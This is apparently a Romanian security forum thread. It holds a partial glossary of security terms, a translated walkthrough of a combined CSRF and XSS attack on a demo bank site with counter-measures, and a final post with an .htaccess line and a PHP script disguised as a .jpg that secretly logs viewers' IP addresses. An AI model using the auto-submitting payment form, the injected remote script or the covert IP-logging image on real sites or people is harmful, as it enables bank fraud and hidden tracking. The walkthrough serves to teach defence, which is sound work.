induce in eroare de interpretare un adversar interceptor. Comprehensive testing (Testare extinsa) – o metodologie de testare ce presupune cunoasterea explicita si semnificativa a structurii interne si detalii de implementare (a) despre obiectul evaluarii. De asemenea, cunoscut sub numele de testare in cutia alba (white box testing). Computer abuse – utilizarea abuziva in mod intentionat sau in mod neglijent, modificarea, stoparea functionarii sau distrugerea resurselor de prelucrare a informatiilor dintr-un sistem de calcul. Criptografie computerizata – utilizarea unui program cripto-algoritm de calculator la autentificare sau pentru a cripta / decripta informatii. Computer forensics – practica de colectare, pastrarea si analizare a datelor referitoare la un computer in scopuri investigative, într-o maniera ce pastreaza integritatea datelor. Computer Incident Response Team (CIRT) (Echipa de raspuns la incidente informatice) – un grup organizat de persoane, de obicei format din analisti de securitate, cu misiunea de a dezvolta, recomanda si coordona actiunile de atenuare imediata a efectelor si consecintelor, de izolare, eradicare si recuperare a rezultatelor in urma incidentelor de securitate informatica. De asemenea numita si Computer Security Incident Response Team (CSIRT) sau CIRC (Computer Incident Response Center, Computer Incident Response Capability sau Cyber Incident Response Team). Computer Network Attack (CNA) (Atacul unei retele de calculatoare) – actiuni intreprinse prin utilizarea unei retele de calculatoare cu scopul de a perturba, refuza accesul la, degrada sau distruge informatiile existente in calculatoare si retele de calculatoare sau calculatoarele si retelele insele. Computer Network Defense (CND) (Apararea unei retele de calculatoare) – actiunile intreprinse pentru a apara o retea de calculatoare impotriva oricarei activitati neautorizate. CND include monitorizarea, detectarea, analiza (cum ar fi tendinta si analiza modelului) si activitatile de raspuns la atac si de restaurare la normal a functionarii. Computer Network Exploitation (CNE) (Exploaterea unei retele de calculatoare) – posibilitatea operatiunilor si a capacitatii de colectare de informatii, efectuate prin utilizarea retelelor de calculatoare pentru a aduna date de la o tinta, din sistemele informatice ale unui inamic sau din retelele acestuia. Computer Network Operations (CNO) (Operatiuni asupra unei retele de calculatoare) – compuse din CNA, CND si CNE, intr-un mediu favorabil desfasurarii unor asemenea operatiuni. Computer Security (COMPUSEC) [securitatea calculatoarelor (COMPUSEC)] – masuri si controale care asigura confidentialitatea, integritatea si disponibilitatea valorilor unui sistem informatic, (hardware, software, firmware, precum si informatiile continute de acesta) dar si atunci cand informatiile sunt prelucrate, depozitate si transmise. Computer Security Object (CSO) – o resursa, un instrument sau un mecanism utilizat la intretinerea starii de securitate intr-un mediu computerizat. Aceste obiecte sunt definite ca fiind atributele de posesie, operatiunile pe care le executa sau care se executa asupra lor si relatiile lor cu alte obiecte. Computing environment – statie de lucru sau server si sistemul sau de operare, periferice si aplicatii. Configuration control – operatiunea de control a modificarilor hardware, firmware, software si documentatiei pentru a proteja un sistemul informatic impotriva modificarii necorespunzatoare inainte, in timpul si dupa implementarea sistemului. Container – fisierul folosit de o tehnologie de encriptare a unui disc virtual pentru a include si a proteja alte fisiere. Content filtering – procesul de monitorizare a comunicatiilor, cum ar fi e-mail si pagini web, analizarea acestora de continut suspect si prevenirea livrarii de continut suspect utilizatorilor. Continuous monitoring – procesul implementat pentru a men?ine o stare curent? de securitate pentru unul sau mai multe sisteme informatice sau pentru intreaga suita de sisteme informatice de care depinde misiunea operationala a organizatiei. Procesul include: 1) elaborarea unei strategii pentru a evalua cu regularitate controalele/metricile IA selectate (IA=identificare si autentificare), 2) inregistrarea si evaluarea evenimentelor IA relevante si eficienta organizatiei in solutionarea acelor evenimente, 3) inregistrarea modificarilor la controalele IA sau modificari ce afecteaza riscurile IA si 4) publicarea starii curente de securitate pentru a permite informarea-schimbul de decizii ce implica intreprinderea. =========================================================================== NU ma injurati, nu ma criticati inca! Nu am terminat! Thread-ul va suferi modificari continuu, iar cand voi termina am sa anunt. Astept desigur, obiectii pertinente prin PM, completari pe subiect, sugestii. =========================================================================== M2G Da, perfect de acord cu tine! N-am ajuns la ei, dar termenii de care mi-ai zis nu ar putea sa lipseasca din el! Asa cum am zis mai sus nu am terminat nici pe de parte. Am inceput cu ceva mai putin cunoscut. Mersi ca ai mentionat, nu e deranj!

In cele ce urmeaza se incearca sa se demonstreze pericolul real care il reprezinta Cross-Site Scripting (XSS) combinat cu Cross-Site Request Forgery (CSRF). S-a creat un site imaginar ca exemplu, al unei banci si s-a demonstrat ca o singura vulnerabilitate XSS si o operatiune de transfer de bani in site-ul banci se poate transforma intr-o pierdere de bani doar vizitand alt site. In exemplul oferit, site-ul bancii nu este "over SSL" dar oricum SSL nu ar preveni acest atac sub nici o forma. Site-ul capcana din exemplul nostru este in intregime controlat de atacator, dar de fapt el poate fi un anunt Flash dintr-un site trusted, aplicatii Facebook / Myspace / LinkedIn sau alte forme de deghizare (mashups) ce ruleaza cod untrusted, sau chiar cod malitios rulind in alt site de incredere cum ar fi un forum sau bulletin board. In exemplul de mai jos, utilizatorul viziteaza site-ul bancii si pe cel al atacatorului in doua tab-uri ale browser-ului concomitent. De fapt, victima este expusa pe intreaga durata a sesiunii pe server. Asta inseamna ca daca un user isi inchide ferestrele browser-ului si de fapt nu face logout din aplicatia bancara, ramane vulnerabil pentru o perioada de timp de obicei cam intre 15 si 30 de minute. http://www.securitycompass.com/videos/xss%20steal.swf La inceput atacul poate parea exagerat din cauza tuturor factorilor ce trebuie sa intre in joc: O victima trebuie sa viziteze un site anume si care sa fie vulnerabil. Victima trebuie apoi sa viziteze un alt site, de data asta unul capcana si care sa stie sa atace site-ul de la pasul 1, in timp ce victima are cate o sesiune valida deschisa. Cum devine acest atac mai putin exagerat in prezent? Un studiu de caz al Web Application Security Consortium (WASC) arata ca aproape 60% din site-uri sunt vulnerabile la XSS. Abilitatea de a descoperi XSS nu a fost niciodata una simpla iar site-urile de public disclosure cum ar fi xssed.com fac din descoperirea vulnerabilitatilor specifice ceva banal. S-a observat ca atacurile reale sunt executate prin intermediul site-urile de retele de socializare si anunturi flash. Acesti vectori de atac permit utilizatorilor rau intentionati sa aiba ca tinte mii de victime in mod concurent – oferind destule victime potentiale, iar sansele ca cel putin cateva dintre ele sa aiba o sesiune valabila pe un site vulnerabil anume devine mai mare. Chiar dac? demo-ul arat? un atac pe o anumita banca, un atacator poate incerca sa atace mai multe site-uri din acelasi JavaScript malitios. Cu alte cuvinte, un fraudator XSS poate incerca cel putin teoretic sa livreze malware pentru mai multe site-uri vulnerabile diferite la mii de victime într-o perioad? foarte scurt? de timp. Ceea ce face deosebit de devastator acest atac este faptul ca victima nu va fi capabila sa anuleze transferul de bani. In jurnalele de tranzactii ale bancii, va apare ca utilizatorul a intentionat si a consimtit sa transfere sumele. Toate tranzactiile au la origine adresa IP a victimei si au fost trimise cu cookie-urile victimei. Doar analiza comportamentala ne dezvaluie ca de fapt povestea e alta - ex.: observarea vitezei anormale a seriei de request-uri sau faptul ca mai multi platitori au transferat bani catre aceeasi persoana intr-un interval scurt de timp - si ca de fapt este vorba despre o frauda. Detaliile tehnice ale atacului Utilizatorul viziteaza http://localhost:3000 (False Secure Bank) In timpul unei sesiuni valide in False Secure Bank, user-ul viziteaza apoi http://127.0.0.1/CSRF_Example (Site-ul atacatorului) In site-ul atacatorului, am adaugat un 0 iFrame cu dimensiuni 0X0, facand astfel continutul iFrame-ului invizibil pentru end user. In iFrame am introdus cod HTML incluzand un form cu valori pre-populate si script-uri ce fac trimiteri in mod automat form-ului din partea user-ului: <form name="input" action="http://localhost:3000/send_payment" method="post"> <input type="text" name="pay[payee]" value="<script src="http://127.0.0.1/CSRF_Example/bankattack.js" type="text/javascript"></script>"> <input type="text" name="amount" value="0"/> <input type="text" name="commit" value="Pay"/> </form> <script>document.input.submit();</script> Observati ca rubrica (campul) plata [persoana platita] este de fapt codul pentru payload-ul Cross Site Scripting. Acesta corespunde vulnerabilitatii XSS descoperita mai devreme in site-ul False Secure Bank. In acest caz, script-ul actual duce catre sursa aflata la http://127.0.0.1/CSRF_Example/bankattack.js. Comanda document.input.submit() trimite in mod automat request-ul din partea user-ului – deci cu alte cuvinte, furnizam un payload Cross Site Scripting (XSS) via un atac Cross Site Request Forgery (CSRF). Browser-ul user-ului in mod automat trimite cererea catre http://localhost:3000/send_payment cu cookie-urile utilizatorului. Utilizatorul nici nu banuie ce s-a intamplat. False Secure Bank trimite un raspuns la IFrame-ul de dimensiunea 0 X 0, de unde isi are originea cererea. Programatorul include o versiune nefiltrata, necodata a parametrului pay[payee] de la cererea send_payment. Deoarece acest parametru ruleaza in browser-ul clientilor, tag-ul <script src=’http://127.0.0.1/CSRF_Example/bankattack.js’ type=’ text/javascript’></script> se executa in mod automat. Browser-ul descarca in mod automat fisierul bankattack.js. Deoarece cererea pentru fisierul JavaScript arata ca provine de la False Secure Bank, browser-ul nu va crede ca acest lucru este o violare a politicii aceleiasi origini. In fisierul JavaScript am inclus serii intregi de cereri si raspunsuri Ajax. Ele arata cam asa: xmlhttp.open("GET", "/payment", false); //AJAX cerere de apel catre ecranul de plata xmlhttp.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); >xmlhttp.send(“”) Tipul de obiect JavaScript "XML HTTP" difera in functie de browser. Putem seta antetele cererii cum vrem noi si putem emula orice continut generat de user – inclusiv modificarea tag-ului user-agent sau a oricaror cookies folosite la urmarirea navigarii utilizatorului. Putem sa salvam raspunsul primit inapoi la comanda "send" si sa scoatem valorile ce ne intereseaza. Sa presupunem ca avem nevoie sa aflam numarul de cont al victimei pentru a transfera niste sume. Putem trimite o cerere XML HTTP la home page si scoatem numarul de cont din raspunsul HTML. In mod similar, putem scoate orice token-uri anti-CSRF odata ce am apucat sa rulam codul malitios JavaScript. False Secure Bank nu suporta si nici contine cod Ajax. Nu ne intereseaza. Ceea ce avem nevoie este doar ca browser-ul user-ului sa aiba suport Ajax, iar browser-ele moderne il au. Codul JavaScript din pasul anterior face cateva cereri diferite: Merge in ecranul de plati Eliminarea numarului de cont al atacatorului Adauga atacatorul ca beneficiar al platii Initiaza plata Confirma plata In timp ce acest scenariu prezinta un transfer bancar, am putea automatiza practic orice serie de cereri, in orice aplicatie web cu acest tip de atac. Contramasuri (Dezvoltatorii) Cea mai usoara contramasura este sa previi Cross Site Scripting. Utilizand judicios codarea puternica a librariilor cum ar fi cele date in proiectul OWASP ESAPI. Urmariti detaliile subliniate in Cross Site Scripting Prevention Cheat Sheet. Folositi cod frame adecvat (Frame Busting - metoda practica ce asigura prin cod html ca site-ul nu va fi afisat printr-un frame). Sunt multe modalitati de a face acest lucru. Retineti ca atacatorul are nevoie de un frame – astfel el va fi nevoit sa execute intregul atac la vederea utilizatorului – fapt ce creste posibilitatea ca userul sa inchida browser-ul si sa stopeze atacul in desfasurare. Metoda cea mai efectiva de prevenire a acestuia si aproape a tuturor atacurilor impotriva tranzactiilor senzitive este utilizarea autentificarii transactionale. Dezvoltatorii pot cere autentificarea Phone Factor, de exemplu, pentru toate transferurile ce depasesc de ex. 100 USD. Desigur orice autentificare aditionala poate ingreuna utilizarea operatiunii si deci sa faca aplicatia mai greoaie. Mai putin efectiva si desigur discutabil, este sa folosim abordarea mai putin prietenoasa a tehnologiei anti-automata CAPTCHA. Vectorul original XSS s-a livrat prin intermediul unui atac CSRF si prin intermediul tranzactiei send_payment. Daca intreaga portiune de autentificare a False Secure Bank ar fi fost protejata impotriva CSRF, n-am fi putut incarca codul reflectiv XSS de prima data. XSS-ul stocat nu are de aceeasi limitare. Contramasuri (Userii finali) Intotdeauna incheiati orice sesiune cu parola cu log out. Acest lucru nu previne atacul complet dar limiteaza in mod semnificativ expunerea la un atac. Nu navigati pe alte site-uri in timp ce rulati aplicatii sensibile cum ar fi de banking online. Folositi plugin-ul de browser NoScript. Da, NoScript previne acest atac, chiar daca tu crezi in scriptul din site-ul capcana, deoarece NoScript identifica cu precizie cererile CSRF ca potentiale atacuri Cross Site Scripting. Sper ca developerii ce creaza propriile aplicatii au frija la securitatea lor si ca ei nu mai cred in mod categoric faptul ca XSS (Cross Site Scripting) este ceva de un risc scazut sau mediu. LE: Multumesc frumos tuturor pentru toate like-urile acordate thread-urilor scrise de mine. Este o mica staisfactie, ce imi demonstreaza ca nu am scris pentru a contribui la cantitate, ci pentru oameni iar acestia au apreciat valoarea informatiei. PS: A propos, cati dintre voi folositi NoScript?

Sa ia aminte vinatorii de xss si sqli de pe forum. Dupa estimarea lui @TheTime aveti 3-6 ani sa invatati mult mai multe decat potentialii contracanditati pe posturile care or sa se deshida. O sa aveti si un avataj mare fata de aia care or facut un curs de securitate prin facultate si vor sa intre in domeniu. Asa ca bagati tare si lasati mai usor cu frecatul de menta.

Deja sunt destule persoane care se pricep cat de cat la calculatoare si stiu sa se fereasca de cei rauvoitori. De exemplu eu nu intru pe linkurile dubioase decat dupa ce dau un view-source:LINK si verific iframe, javascript, vbscript etc. (nu incepeti cu tampenii ca de aici reiese ca m-as pricepe la calculatoare) Pasul 1 Creati un fisier .htaccess cu continutul urmator. AddType application/x-httpd-php .jpg Pasul 2 Creati un fisier .jpg cu codul urmator. <?php $ip=$_SERVER['REMOTE_ADDR']; $x1=fopen("ip.txt","a"); fwrite($x1,$ip."\r"); fclose($x1); header('Content-Type: image/jpeg'); header ("Cache-Control: no-cache, must-revalidate"); echo file_get_contents('avatar.png'); ?> Acolo unde ii luati ip-ul mai puteti extrage informatii precum browserul, sistemul de operare sau altele. Cine verifica un link cu imagine? Pai sunt unii care stiu ca poti crea un director cu .jpg si nu vor da click sau vor verifica sursa, iar in aceasta nu este nimic dubios. Stiu ca unii vor stramba din nas, dar sigur poate fi de ajutor. Mai stiu ca poti extrage IP-ul si din log-uri, da, dar e mai usor sa nu cauti.